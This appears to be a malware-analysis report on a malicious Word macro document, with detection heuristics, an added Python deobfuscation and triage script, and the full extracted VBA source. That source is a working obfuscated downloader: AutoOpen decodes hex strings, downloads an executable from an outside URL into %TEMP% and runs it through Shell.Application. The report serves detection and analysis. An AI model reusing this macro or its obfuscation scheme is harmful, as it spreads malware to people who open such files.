Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 211fd58aea279d3c…

MALICIOUS

Office (OLE)

Size: 43.5 KB
Created: 2014-12-08 20:55:00
Authoring application: Microsoft Office Word
First seen: 2015-01-04
MD5: 9d0b2db07a5c5a903e0d599c8fcc63ca
SHA-1: c7de3ff8b336186e736c6149793612a385ee682f
SHA-256: 211fd58aea279d3c65b46ec8bced1fe0fb63b43d0ca32a6868af651d68335d9c
Risk Score: 384

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample contains obfuscated VBA macros that declare the urlmon export URLDownloadToFileA (with a PtrSafe variant under #If Win64) and use it to fetch and execute a second-stage payload. The AutoOpen and Workbook_Open entry points both call the same routine, which rebuilds its strings at run time through a custom HexToString() decoder: the download URL decodes to http://jasoncurtis.co.uk/js/bin.exe, the destination to %TEMP%\1V2MUY2XWYSFXQ.exe, and the COM ProgID to Shell.Application, whose Open method then launches the dropped executable. This is downloader/dropper behaviour. The decoder and the calling routine are padded with never-true conditionals, empty loops and GoTo-skipped file I/O so that no URL, ProgID or API sink appears in clear text in the macro source; obfuscated string reconstruction feeding a download-and-execute API chain is a common malware-distribution technique. One caveat for analysts: Workbook_Open is an Excel event and never fires in a Word document, so in this sample only AutoOpen is a live trigger; its presence suggests a macro builder that targets both Word and Excel.

Heuristics (11)

  • ClamAV: Doc.Downloader.Macr-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Macr-1
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
        Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal NRTMLM As Long, _
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Set fdfgdfeer4gf = CreateObject(HexToString("5368656C6C2E4170706C69636174696F6E"))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set fdfgdfeer4gf = CreateObject(HexToString("5368656C6C2E4170706C69636174696F6E"))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
        Destination = Environ(HexToString("54454D50")) & HexToString("5C3156324D555932585759534658512E657865")
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Caveat for this sample: the rule text does not fit here, because a VBA project was recovered (see Extracted artifacts, macros.bas) and it defines Sub AutoOpen(); the marker that matched is most likely that AutoOpen name, so treat this finding as redundant with OLE_VBA_AUTOOPEN rather than as evidence of a separate WordBasic macro.
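The summary above and the OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER finding describe the same loader shape: a HexToString() decoder padded with dead GoTo blocks, called from auto-exec entry points, feeding CreateObject / URLDownloadToFileA / Shell.Application sinks. The following Python is an added worked example, not part of this report and not code from oletools or any other analysis tool. It reproduces the macro's decoder, strips the dead `GoTo lbl ... lbl:` junk, and triages entry points and sinks on the clear-text form. The SAMPLE_VBA excerpt is copied from the recovered macro with the no-op loops and conditionals left out; the AUTOEXEC and SINKS lists are the example's own choices, not the report's rule definitions.

```python
"""Deobfuscate and triage the HexToString()-style VBA loader from this report.

Added worked example (not part of the original report, and not code from
oletools or any other analysis tool). It decodes every HexToString("...")
literal the way the macro's own decoder does (two hex digits -> one char),
removes the dead `GoTo lbl ... lbl:` junk blocks padded into the decoder,
and flags auto-exec entry points and execution sinks together with their
now-clear arguments. Point deobfuscate()/triage() at the full macros.bas
text to get the same result on the whole module.
"""
import re

# Constructed excerpt: the functional lines of the recovered macro, copied
# from the report with the never-true conditionals and empty loops omitted.
SAMPLE_VBA = r'''
Sub AutoOpen()
    azaza
End Sub
Sub Workbook_Open()
    azaza
End Sub
Sub fdigjkf()
    SourceName = HexToString("687474703A2F2F6A61736F6E6375727469732E636F2E756B2F6A732F62696E2E657865")
    Destination = Environ(HexToString("54454D50")) & HexToString("5C3156324D555932585759534658512E657865")
    R = URLDownloadToFileA(0&, SourceName, Destination, 0&, 0&)
    Set fdfgdfeer4gf = CreateObject(HexToString("5368656C6C2E4170706C69636174696F6E"))
fdfgdfeer4gf.Open Destination
End Sub
Public Function HexToString(ByVal fSoeUjt As String) As String
For GCNQgBCMVQ = 1 To Len(fSoeUjt) Step 2
GoTo ypgcwVuP
Dim PyXKOlVZ As String
Open "WFZLQU.WQZ" For Binary As 61
Put #61, , PyXKOlVZ
Close #61
ypgcwVuP:
cOBcy = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(fSoeUjt, GCNQgBCMVQ, 2)))
aGZKOocaTmjFc = aGZKOocaTmjFc & cOBcy
Next GCNQgBCMVQ
HexToString = aGZKOocaTmjFc
End Function
'''

HEX_CALL = re.compile(r'HexToString\("((?:[0-9A-Fa-f]{2})+)"\)')
GOTO = re.compile(r'^\s*GoTo\s+(\w+)\s*$')
# Entry points Office runs without user interaction (Word and Excel names;
# Workbook_Open is inert in a Word document but still worth surfacing).
AUTOEXEC = ("AutoOpen", "Document_Open", "AutoExec", "Workbook_Open", "Auto_Open")
# Download / COM-instantiation / execution sinks (example's own list).
SINKS = ("URLDownloadToFile", "CreateObject", "Shell", ".Open ", ".Run ", "Environ(")


def hex_to_string(hex_text: str) -> str:
    """Equivalent of the macro's decoder: Val("&H" & pair) -> Chr$(code)."""
    return bytes.fromhex(hex_text).decode("latin-1")


def strip_dead_goto_blocks(src: str) -> str:
    """Drop `GoTo lbl`, everything up to the matching forward `lbl:` line, and
    the label itself. Assumes nothing else jumps into the skipped span, which
    holds for this sample (the spans only Open/Put/Close junk files)."""
    lines = src.splitlines()
    out, i = [], 0
    while i < len(lines):
        m = GOTO.match(lines[i])
        if m:
            label = m.group(1) + ":"
            target = next((k for k in range(i + 1, len(lines))
                           if lines[k].strip() == label), None)
            if target is not None:
                i = target + 1
                continue
        out.append(lines[i])
        i += 1
    return "\n".join(out)


def deobfuscate(src: str) -> str:
    """Dead-code removal, then each HexToString("..") call is replaced in
    place by the decoded string literal."""
    cleaned = strip_dead_goto_blocks(src)
    return HEX_CALL.sub(lambda m: '"' + hex_to_string(m.group(1)) + '"', cleaned)


def decoded_literals(src: str) -> list:
    """Every decoded HexToString() argument in source order (IOC harvest)."""
    return [hex_to_string(h) for h in HEX_CALL.findall(src)]


def triage(src: str) -> dict:
    """Entry points and sink lines, evaluated on the clear-text form so the
    decoded URL / ProgID / path appear next to the API that consumes them."""
    clear = deobfuscate(src)
    entry = [n for n in AUTOEXEC
             if re.search(r'\bSub\s+' + re.escape(n) + r'\s*\(', clear)]
    sinks = [ln.strip() for ln in clear.splitlines()
             if any(s in ln for s in SINKS)]
    verdict = "obfuscated auto-exec loader" if entry and sinks else "no loader shape"
    return {"autoexec": entry, "sinks": sinks,
            "literals": decoded_literals(src), "verdict": verdict}


if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(key, value)
```

Running it on the excerpt yields the three IOCs in `literals` (the URL, `TEMP`, and the `\1V2MUY2XWYSFXQ.exe` suffix), both entry points in `autoexec`, and four sink lines: the Environ() path build, the URLDownloadToFileA call, the CreateObject("Shell.Application") instantiation and the `.Open Destination` launch. On the full macros.bas the nested GoTo spans inside the decoder collapse as well, because each outer `GoTo` skips straight to its own label line.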

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8597 bytes
SHA-256: 9614db20be5811b91a4d7a43f3baaeaedff9ac4487189ae7375dfd4e1300f4ff
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If Win64 Then
    Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal NRTMLM As Long, _
ByVal UUQCES As String, ByVal VKDDKH As String, ByVal XXRYIY As Long, _
ByVal RPBFSI As Long) As Long
#Else
    Private Declare Function URLDownloadToFileA Lib "urlmon" (ByVal NRTMLM As Long, _
ByVal UUQCES As String, ByVal VKDDKH As String, ByVal XXRYIY As Long, _
ByVal RPBFSI As Long) As Long
#End If

Sub azaza()
fdigjkf
End Sub
Sub AutoOpen()
    azaza
End Sub
Sub Workbook_Open()
    azaza
End Sub
Sub fdigjkf()
Dim RJkZmwMk As Integer
For RJkZmwMk = 0 To 2
Dim gOBzOgqU As Integer
For gOBzOgqU = 0 To 2
If 955689 = 955689 + 1 Then End
If 3474 < 96 Then
        MsgBox (HexToString("5677734F6D61436F3138"))
End If
If Len(HexToString("68766372514F4A7237393238")) = Len(HexToString("476B554868716964")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
DoEvents

Next gOBzOgqU
If 685526 = 685526 + 1 Then End
If 6625 < 25 Then
        MsgBox (HexToString("674E6B646E506D613434"))
End If
If Len(HexToString("43697476567A577434363732")) = Len(HexToString("474A714567704E4D")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
DoEvents

Next RJkZmwMk
Dim lszHAqCJ As Integer
For lszHAqCJ = 0 To 5
If 854281 = 854281 + 1 Then End
If 6253 < 58 Then
        MsgBox (HexToString("566379706365674C3333"))
End If
If Len(HexToString("43506D647A746D7533323139")) = Len(HexToString("696F774F654C6652")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
DoEvents

Next lszHAqCJ
If 183441 = 183441 + 1 Then End
If 5497 < 78 Then
        MsgBox (HexToString("415A5647447743683834"))
End If
If Len(HexToString("4A4D47496279494432343534")) = Len(HexToString("494557444866445A")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
    SourceName = HexToString("687474703A2F2F6A61736F6E6375727469732E636F2E756B2F6A732F62696E2E657865")


Dim DHVtTdBh As Integer
For DHVtTdBh = 0 To 9
Dim cObzsaQX As Integer
For cObzsaQX = 0 To 9
If 439747 = 439747 + 1 Then End
If 4332 < 16 Then
        MsgBox (HexToString("46544C74726F42493831"))
End If
If Len(HexToString("534C6F694971745732343838")) = Len(HexToString("566B70524F42566C")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
DoEvents

Next cObzsaQX
If 668923 = 668923 + 1 Then End
If 3566 < 69 Then
        MsgBox (HexToString("6B50534F6C4155743431"))
End If
If Len(HexToString("5965454579736C4137323139")) = Len(HexToString("716A6E6B4B556154")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
DoEvents

Next DHVtTdBh
Dim jceDHuHg As Integer
For jceDHuHg = 0 To 8
If 511345 = 511345 + 1 Then End
If 8831 < 52 Then
        MsgBox (HexToString("5A564A66636C77773634"))
End If
If Len(HexToString("4D4E7A494661686833353734")) = Len(HexToString("6C4D64776C415976")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
DoEvents

Next jceDHuHg
If 966153 = 966153 + 1 Then End
If 9431 < 53 Then
        MsgBox (HexToString("49446346687173773732"))
End If
If Len(HexToString("6A57714E445A516237343837")) = Len(HexToString("6F526A7465504868")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
    Destination = Environ(HexToString("54454D50")) & HexToString("5C3156324D555932585759534658512E657865")

Dim bbkElRqJ As Integer
For bbkElRqJ = 0 To 1
Dim yFrPalZL As Integer
For yFrPalZL = 0 To 3
If 328237 = 328237 + 1 Then End
If 6119 < 57 Then
        MsgBox (HexToString("6B79546F727679703739"))
End If
If Len(HexToString("5645424D564B634834313636")) = Len(HexToString("6F7A4E6A42556A64")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
DoEvents

Next yFrPalZL
If 132136 = 132136 + 1 Then End
If 1189 < 35 Then
        MsgBox (HexToString("6361476C5A664F723838"))
End If
If Len(HexToString("6C525358456B554C37313436")) = Len(HexToString("564B495068446743")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
DoEvents

Next bbkElRqJ
Dim BZUmTvUs As Integer
For BZUmTvUs = 0 To 2
If 272823 = 272823 + 1 Then End
If 2853 < 81 Then
        MsgBox (HexToString("6E797969557159763635"))
End If
If Len(HexToString("626C6D716473535138383139")) = Len(HexToString("504B77556661546F")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
DoEvents

Next BZUmTvUs
If 985756 = 985756 + 1 Then End
If 6833 < 83 Then
        MsgBox (HexToString("5461686C7461706B3734"))
End If
If Len(HexToString("576C69664B51584731353636")) = Len(HexToString("6255727A4575454C")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
    R = URLDownloadToFileA(0&, SourceName, Destination, 0&, 0&)

Dim IvVtEwhF As Integer
For IvVtEwhF = 0 To 8
Dim JmFMnIxK As Integer
For JmFMnIxK = 0 To 4
If 731477 = 731477 + 1 Then End
If 5925 < 46 Then
        MsgBox (HexToString("4A70476D7A5342453936"))
End If
If Len(HexToString("487874635944744A32393732")) = Len(HexToString("6157794D555A4266")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
DoEvents

Next JmFMnIxK
If 522828 = 522828 + 1 Then End
If 2294 < 56 Then
        MsgBox (HexToString("7368616E4A6C76783337"))
End If
If Len(HexToString("41494B6D4572714C39323531")) = Len(HexToString("7958476F68624B43")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
DoEvents

Next IvVtEwhF
Dim PokTrFAq As Integer
For PokTrFAq = 0 To 3
If 926197 = 926197 + 1 Then End
If 3188 < 27 Then
        MsgBox (HexToString("61696D725A597A713439"))
End If
If Len(HexToString("5954474778616C4A31313535")) = Len(HexToString("4A72477178486467")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
DoEvents

Next PokTrFAq
If 959838 = 959838 + 1 Then End
If 9367 < 37 Then
        MsgBox (HexToString("776659706B6641723731"))
End If
If Len(HexToString("6B4A5A536C6B764C37333234")) = Len(HexToString("5874766E74447943")) Then
       MsgBox (HexToString("4572726F7220212121"))
End If
    Set fdfgdfeer4gf = CreateObject(HexToString("5368656C6C2E4170706C69636174696F6E"))

fdfgdfeer4gf.Open Destination
End Sub


Public Function HexToString(ByVal fSoeUjt As String) As String
Dim cOBcy As String
Dim aGZKOocaTmjFc As String
Dim GCNQgBCMVQ As Long
For GCNQgBCMVQ = 1 To Len(fSoeUjt) Step 2

GoTo ypgcwVuP
Dim PyXKOlVZ As String
Open "WFZLQU.WQZ" For Binary As 61

GoTo EcTiprEi
Dim olfZxvmN As String
Open "UMQSTP.UJQ" For Binary As 23
Put #23, , olfZxvmN
Close #23
EcTiprEi:

Put #61, , PyXKOlVZ

GoTo SxsOmWIy
Dim kkLtIhbV As String
Open "QLANPT.WSB" For Binary As 33
Put #33, , kkLtIhbV
Close #33
SxsOmWIy:

Close #61

GoTo UNIWzNhk
Dim dWjjhmup As String
Open "OISYAI.OYD" For Binary As 28
Put #28, , dWjjhmup
Close #28
UNIWzNhk:

ypgcwVuP:


GoTo GowCpKKx
Dim lrekcdOf As String
Open "SDYYTR.SPY" For Binary As 39
Put #39, , lrekcdOf
Close #39
GowCpKKx:

cOBcy = Chr$(Val(Chr$(38) & Chr$(72) & Mid$(fSoeUjt, GCNQgBCMVQ, 2)))

GoTo rmmXlBRJ
Dim OhejTlwO As String
Open "MLTYOU.RQE" For Binary As 62

GoTo CoWXDRlP
Dim ZrEkNNpZ As String
Open "VCCFOH.UGW" For Binary As 74
Put #74, , ZrEkNNpZ
Close #74
CoWXDRlP:

Put #62, , OhejTlwO

GoTo KSlimPNX
Dim QeoLsJgb As String
Open "WSOMBL.FBR" For Binary As 79
Put #79, , QeoLsJgb
Close #79
KSlimPNX:

Close #62

GoTo JXbUkQce
Dim OdhliKSY As String
Open "MJSUVL.ROP" For Binary As 62
Put #62, , OdhliKSY
Close #62
JXbUkQce:

rmmXlBRJ:


GoTo POelWJZw
Dim ENMrSVJB As String
Open "JQABDX.AEB" For Binary As 59
Put #59, , ENMrSVJB
Close #59
POelWJZw:

aGZKOocaTmjFc = aGZKOocaTmjFc & cOBcy
Next GCNQgBCMVQ

GoTo iCcPqWja
Dim DKytcjiL As String
Open "XUUNTY.SOO" For Binary As 77

GoTo kLqGaseY
Dim XGKpfUWv As String
Open "ATNZAF.PCV" For Binary As 87
Put #87, , XGKpfUWv
Close #87
kLqGaseY:

Put #77, , DKytcjiL

GoTo dcUaIkQK
Dim JlgwWSZP As String
Open "VMQIJJ.VJS" For Binary As 83
Put #83, , JlgwWSZP
Close #83
dcUaIkQK:

Close #77

GoTo qUFnTloB
Dim GZwWKDNJ As String
Open "CBGWHJ.FZJ" For Binary As 75
Put #75, , GZwWKDNJ
Close #75
qUFnTloB:

iCcPqWja:


GoTo ebWXGwas
Dim IwEjzJLe As String
Open "AYCFPS.PVW" For Binary As 87
Put #87, , IwEjzJLe
Close #87
ebWXGwas:

HexToString = aGZKOocaTmjFc
End Function